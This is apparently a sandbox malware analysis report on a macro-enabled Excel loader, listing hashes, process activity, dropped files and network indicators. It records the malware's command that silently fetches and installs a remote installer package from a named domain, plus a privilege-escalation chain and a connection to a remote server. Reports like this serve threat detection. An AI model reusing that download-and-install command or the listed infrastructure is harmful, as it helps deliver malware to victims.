File name: 58f3db592f45923897ba352b01cc01f2efecfd6408d36f784aa587c13f4babea

Full analysis: https://app.any.run/tasks/2d80619f-e43e-426f-8cde-1d8a8f1b71cb
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 22, 2019, 06:53:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, opendir, exe-to-msi, loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5: 61ECFB80E39C601E495300CF454211BB
SHA1: 2D3869C14031B2356BD2E1D015CA66B75CBC1EF9
SHA256: 58F3DB592F45923897BA352B01CC01F2EFECFD6408D36F784AA587C13F4BABEA
SSDEEP: 384:+UkhQLWN/7Vk06JbqTVouZGeGFNgQITM/5Zy4:+RX7O4JZGBTIgxk4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from Microsoft Office
      • EXCEL.EXE (PID: 1660)
    • Uses Microsoft Installer as loader
      • EXCEL.EXE (PID: 1660)
    • Downloads executable files from the Internet
      • msiexec.exe (PID: 1052)
    • Known privilege escalation attack
      • MSI9B9E.tmp (PID: 2876)
      • MSI9B9E.tmp (PID: 948)
    • Changes the autorun value in the registry
      • MSI9B9E.tmp (PID: 948)
      • systemcos.exe (PID: 3920)
    • Application was dropped or rewritten from another process
      • systemcos.exe (PID: 3920)
      • systemcos.exe (PID: 3056)
  • SUSPICIOUS
    • Executable content was dropped or overwritten
      • msiexec.exe (PID: 1052)
      • MSI9B9E.tmp (PID: 948)
    • Drop ExeToMSI Application
      • msiexec.exe (PID: 1052)
    • Modifies the open verb of a shell class
      • MSI9B9E.tmp (PID: 2876)
      • MSI9B9E.tmp (PID: 948)
    • Executes scripts
      • MSI9B9E.tmp (PID: 948)
    • Starts CMD.EXE for commands execution
      • WScript.exe (PID: 3436)
    • Creates files in the user directory
      • MSI9B9E.tmp (PID: 948)
    • Application launched itself
      • systemcos.exe (PID: 3056)
    • Connects to unusual port
      • systemcos.exe (PID: 3920)
  • INFO
    • Reads Microsoft Office registry keys
      • EXCEL.EXE (PID: 1660)
    • Starts application with an unusual extension
      • msiexec.exe (PID: 1052)
      • MSI9B9E.tmp (PID: 1624)
      • MSI9B9E.tmp (PID: 1048)
      • eventvwr.exe (PID: 3280)
    • Application was dropped or rewritten from another process
      • MSI9B9E.tmp (PID: 1624)
      • MSI9B9E.tmp (PID: 2876)
      • MSI9B9E.tmp (PID: 1048)
      • MSI9B9E.tmp (PID: 948)
    • Application launched itself
      • MSI9B9E.tmp (PID: 1624)
      • MSI9B9E.tmp (PID: 1048)
    • Writes to a desktop.ini file (may be used to cloak folders)
      • msiexec.exe (PID: 1052)
No Malware configuration.

TRiD

.xlsm | Excel Microsoft Office Open XML Format document (with Macro) (50.8)
.xlsx | Excel Microsoft Office Open XML Format document (30)
.zip | Open Packaging Conventions container (15.4)
.zip | ZIP compressed archive (3.5)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x0e351b74
ZipCompressedSize: 388
ZipUncompressedSize: 1218
ZipFileName: [Content_Types].xml

XML

Application: Microsoft Excel
DocSecurity: None
ScaleCrop: No
HeadingPairs:
  • Worksheets
  • 1
TitlesOfParts: Sheet1
Company: -
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15.03
LastModifiedBy: yyyyyyyyyyyy
CreateDate: 2019:03:05 12:00:55Z
ModifyDate: 2019:03:05 12:06:52Z

XMP

Creator: yyyyyyyyyyyy
No data.
All screenshots are available in the full report
Total processes: 47
Monitored processes: 13
Malicious processes: 7
Suspicious processes: 4

Behavior graph

(Interactive graph available in the full report.) Processes shown in the graph: excel.exe, msiexec.exe (2 instances), msi9b9e.tmp (4 instances), eventvwr.exe (2 instances), wscript.exe, cmd.exe, systemcos.exe (2 instances).

Process information

PID: 1660
CMD: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Exit code: 0
Version: 14.0.6024.1000

PID: 1276
CMD: "C:\Windows\System32\msiexec.exe" /i http://reinhausn.com/rr.msi /qn
Path: C:\Windows\System32\msiexec.exe
Parent process: EXCEL.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows® installer
Exit code: 0
Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID: 1052
CMD: C:\Windows\system32\msiexec.exe /V
Path: C:\Windows\system32\msiexec.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows® installer
Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID: 1624
CMD: "C:\Windows\Installer\MSI9B9E.tmp"
Path: C:\Windows\Installer\MSI9B9E.tmp
Parent process: msiexec.exe
User: admin
Company: OVERSETTLING
Integrity Level: MEDIUM
Description: traveloguer
Exit code: 0
Version: 1.01.0007

PID: 2876
CMD: C:\Windows\Installer\MSI9B9E.tmp"
Path: C:\Windows\Installer\MSI9B9E.tmp
Parent process: MSI9B9E.tmp
User: admin
Company: OVERSETTLING
Integrity Level: MEDIUM
Description: traveloguer
Exit code: 0
Version: 1.01.0007

PID: 2580
CMD: "C:\Windows\System32\eventvwr.exe"
Path: C:\Windows\System32\eventvwr.exe
Parent process: MSI9B9E.tmp
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Event Viewer Snapin Launcher
Exit code: 3221226540
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3280
CMD: "C:\Windows\System32\eventvwr.exe"
Path: C:\Windows\System32\eventvwr.exe
Parent process: MSI9B9E.tmp
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Event Viewer Snapin Launcher
Exit code: 3221225547
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1048
CMD: "C:\Windows\Installer\MSI9B9E.tmp"
Path: C:\Windows\Installer\MSI9B9E.tmp
Parent process: eventvwr.exe
User: admin
Company: OVERSETTLING
Integrity Level: HIGH
Description: traveloguer
Exit code: 0
Version: 1.01.0007

PID: 948
CMD: C:\Windows\Installer\MSI9B9E.tmp"
Path: C:\Windows\Installer\MSI9B9E.tmp
Parent process: MSI9B9E.tmp
User: admin
Company: OVERSETTLING
Integrity Level: HIGH
Description: traveloguer
Exit code: 0
Version: 1.01.0007

PID: 3436
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\install.vbs"
Path: C:\Windows\System32\WScript.exe
Parent process: MSI9B9E.tmp
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Total events: 1 368
Read events: 1 268
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 3
Suspicious files: 3
Text files: 9
Unknown types: 3

Dropped files

PID | Process | Filename | Type
1660 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8A26.tmp.cvr | -
1052 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF438457E2A22AEFC2.TMP | -
1660 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~$58f3db592f45923897ba352b01cc01f2efecfd6408d36f784aa587c13f4babea.xlsm | -
1660 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF0A6BF836B8E0404E.TMP | -
1052 | msiexec.exe | C:\Config.Msi\f99c8.rbs | -
1052 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF0AD1C9A6A31BCA62.TMP | -
1052 | msiexec.exe | C:\Windows\Installer\MSI9496.tmp | executable
  MD5: 03F04D3F533121C354E491A6043782F9
  SHA256: 977BA15934A9C2B0CE2B2CAF4ED54A41087A2B53BD13C6CA6AAF40E9BB4AB25F
1052 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat
  MD5: 32AE8E96394080E1465AF9EBA05893D6
  SHA256: D46886C9A7E49B281E60F6956ED62CA6F65F417554793254DB28176E4BE1BA3C
948 | MSI9B9E.tmp | C:\Users\admin\AppData\Roaming\syscos\systemcos.exe | executable
  MD5: A708F643D74FF738CD0415630A250C6A
  SHA256: FF26B6C00F29196B0AA10EA509F1B1FD9CB97814D792FFBAC1869F2E2B6C9495
1052 | msiexec.exe | C:\Windows\Installer\MSI9A25.tmp | binary
  MD5: E056FB8943DF26B8B23FE9D2C6CAF6C7
  SHA256: 09FE183A6FDCCFCB0B0053AAC091B2EE07CB2C6ADB0EB4BE9738EF6C008D3029
HTTP(S) requests: 1
TCP/UDP connections: 4
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1052 | msiexec.exe | GET | 200 | 111.90.151.148:80 | http://reinhausn.com/rr.msi | MY | executable | 500 Kb | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3920 | systemcos.exe | 194.68.59.59:1744 | - | Inleed AB | SE | unknown
1052 | msiexec.exe | 111.90.151.148:80 | reinhausn.com | Shinjiru Technology Sdn Bhd | MY | suspicious

DNS requests

Domain | IP | Reputation
reinhausn.com | 111.90.151.148 | suspicious

Threats

PID | Process | Class | Message
1052 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download
1052 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download
1052 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download

1 ETPRO signature is available in the full report
No debug info